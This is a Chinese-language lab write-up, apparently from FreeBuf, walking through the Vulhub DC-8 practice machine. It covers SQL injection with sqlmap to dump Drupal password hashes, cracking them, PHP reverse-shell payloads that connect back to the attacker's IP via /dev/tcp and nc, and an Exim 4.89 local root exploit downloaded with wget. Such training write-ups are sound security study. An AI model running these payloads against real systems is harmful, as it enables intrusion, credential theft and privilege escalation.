Vulhub 靶场训练,DC-8解析
2024-2-5 09:32:0 Author: www.freebuf.com(查看原文) 阅读量:6 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

kali的IP地址:192.168.200.14

DC-8的IP地址:192.168.200.13(一个flag)

靶机和攻击机处于同一个网络方式:nat或桥接

若出现开机错误,适当将dc的兼容版本改低,我的vmware workstation是17改成16.x就可以兼容

1、扫描同网段存活主机

第一种方式:

arp-scan -l

1707096409_65c0395921b40dc60ff96.png!small?1707096410866

第二种方式:

netdiscover -r 192.168.200.0/24

1707096416_65c039601181f4d8b1c39.png!small?1707096417428

2、开放端口探测

nmap -sV -p-  192.168.200.13 

1707096425_65c039690ea669f78bb6c.png!small?1707096426517

开放端口有两个:22(SSH服务默认端口)和80(http默认端口)

3.目录扫描

1707096435_65c039730c337d1afd246.png!small?1707096435976

1707096440_65c03978b5445e89cc547.png!small?1707096441695

1707096446_65c0397e8e10780b3a8ed.png!small?1707096447687

查看robots。txt文件

1707096453_65c03985d5c12d553a15e.png!small?1707096454863

这些禁止爬取的文件基本上都访问不了

访问web页面

1707096463_65c0398f22eef008ab219.png!small?1707096464271

和DC-7一样的CMS(Drupal),DC-7的版本是8的,这个DC-8的版本是7的

不过页面中存在这样的三个不同的URL:

http://192.168.200.13/?nid=1

http://192.168.200.13/?nid=2

http://192.168.200.13/?nid=3

可能存在文件包含和SQL注入的漏洞

1707096470_65c039962f0f115be5ec5.png!small?1707096471645

SQLMAP

1、扫描数据库

sqlmap -u "http://192.168.200.13/?nid=1" --dbs --batch

1707096477_65c0399d72bfdc0d23575.png!small?1707096478950

2、查询数据表名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db --tables --batch

1707096485_65c039a5d4af8cf95cfed.png!small?1707096487029

3、查询字段名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users --columns --batch

1707096514_65c039c21d342f8fe79b0.png!small?1707096515383

4、查询字段值

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users -C name,pass --dump

1707096522_65c039ca6b2365f349616.png!small?1707096523660

账号:admin

密码:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

账号:john

密码:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

1.爆破密码密文

Drupal的hash密文是经过特殊加密的,用john进行爆破,先保存到password.txt文件中

vim  password.txt

1707096531_65c039d3bb66f35725e7e.png!small?1707096532801

1707096536_65c039d81cbd1402d3f97.png!small?1707096537157

爆破出来密文:turtle

试试 能不能直接账号对 DC-8 进行ssh登录,没成功,只能想办法获取webshell了

1707096543_65c039df78274a11f26ce.png!small?1707096544679

2.反弹shell

先用获得的密码:turtle登录,试试登录后台,应该是john的密码

1707096551_65c039e79bfdde944fbc5.png!small?1707096552648

登录成功!

1707096560_65c039f011ecd7e3c15ad.png!small?1707096561194

还是运用上一靶场的方法,找一找能上传一句话木马的php文件

连不上。然后显示phpinfo的地址死活没反应

直接获取shell

PHP反弹 shell(Post 请求发送命令)

<?php system("bash -i > /dev/tcp/192.168.200.14/8899 0>&1");?>    #交互式shell

<?php system("bash -c 'sh -i &>/dev/tcp/192.168.200.14/8899 0>&1'");?>  #交互式shell

<?php
exec("nc -e /bin/bash 192.168.200.14 8899");
?> 

将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码

1707096569_65c039f9a28c02c881412.png!small?1707096570796

1707096577_65c03a01c32a87b84ba20.png!small?1707096578738

成功反弹shell

1707096584_65c03a08b316ebe7af53b.png!small?1707096585882

3.提权

查一下suid权限的二进制文件

find / -perm -4000 -print 2>/dev/null

1707096593_65c03a11292240a711ffe.png!small?1707096594204

查询Exim 版本为4.89

1707096599_65c03a17d0a1b56852b03.png!small?1707096601070

利用kali搜索EXP

1707096607_65c03a1f33af4c2c75f53.png!small?1707096608721

不破坏原有结构,复制一份新的命名为shell.sh(到kali端的桌面)

cp /usr/share/exploitdb/exploits/linux/local/46996.sh shell.sh  

开启http服务

python -m http.server 8899

注:交互页面,方便后续操作

python -c 'import pty;pty.spawn("/bin/bash")'

在DC-7中下载该文件

wget  //192.168.200.57:8888/shell.sh

1707096618_65c03a2ab235c83dad241.png!small?1707096619975

文件权限是无执行权限的,赋予执行权限

chmod 777 shell.sh

1707096624_65c03a3099b52fea1d07b.png!small?1707096625612

赋予可执行权限

1707096631_65c03a37429f8a5dd4cb6.png!small?1707096632431

接着根据sh脚本提示,执行文件

./shell.sh

不过奇怪的是,执行完之后还是普通权限

1707096639_65c03a3f0fd4448180713.png!small?1707096640196

查看脚本的使用规则,又两个参数可用

1707096646_65c03a46a9b6db15e4945.png!small?1707096647939

将两个规则分别运行,第一个规则在运行之后无效;第二个规则成功运行,等待几秒之后,输入whoami可以看到提权成功

1707096655_65c03a4f05f984e4d9eac.png!small?1707096656246

近到root目录,查看最终flag内容

1707096662_65c03a56e5e5373c325fd.png!small?1707096664524


文章来源: https://www.freebuf.com/articles/web/391489.html
如有侵权请联系:admin#unsafe.sh